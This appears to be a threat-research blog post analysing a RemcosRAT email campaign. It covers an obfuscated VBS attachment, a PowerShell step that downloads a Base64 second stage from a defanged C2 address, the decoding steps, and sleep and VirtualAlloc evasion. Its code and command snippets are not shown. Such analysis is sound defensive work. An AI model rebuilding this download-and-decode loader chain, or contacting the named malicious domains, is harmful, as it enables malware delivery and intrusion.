Pipeline Research

[Pipeline Research] Investigating A Prepared Campaign of RemcosRAT

Pipeline, Inc. observed a recent threat campaign of RemcosRAT malware. The threat actor was distributing malicious VBS file via e-mail attachment. The infection chain is like below-

Photo: Infection Chain We Observed

At first we found a very obfuscated VBS e-mail attachment which was hard to analyze. We first de-obfuscated it and found that the below function is executed by PowerShell-

This snippet of code is executed by Wscript.Shell. It downloads the second payload from C2 server using the PowerShell cmdlet Start-BitsTransfer and writes the payload to a local file named Asturi.Bel. The C2 server URL is-

hxxps[://]spiderzlame[.]shop/Memoreres[.]hhk

Surprisingly when we visited the domain, we got this-

Even, when we try to get the Whois info for the domain, we get 'Server is busy now, please try again later.' like below-

This is why it seems to be a very prepared threat campaign, where the obfuscation is everywhere. Anyway, the payload downloaded from the C2 is a very long Base64 data (more than 200k characters)-

Photo: Base64 Payload Downloaded from C2

The payload is decoded using the [System.Convert]::FromBase64String() method. Then it uses the [System.Text.Encoding]::ASCII.GetString() method to convert the byte array to string. Although de-obfuscating is not completed yet. Some garbage text is still there in the payload. So, the malware now uses the substring() function to extract the actual payload-

This payload contains a function Spnding02() at the beginning. Which is used to de-obfuscate the next stage payload. After de-obfuscating and simplifying the payload, it looks like below-

The malware found to be connected with another domain-

windowsupdatebg[.]s[.]llnwi[.]net

The malware’s name in the e-mail attachment is 'importe PDF.vbs'. The malware sleeps sometime as an evasion technique and uses VirtualAlloc() function for reserving code to execute. Some of its command lines are as below-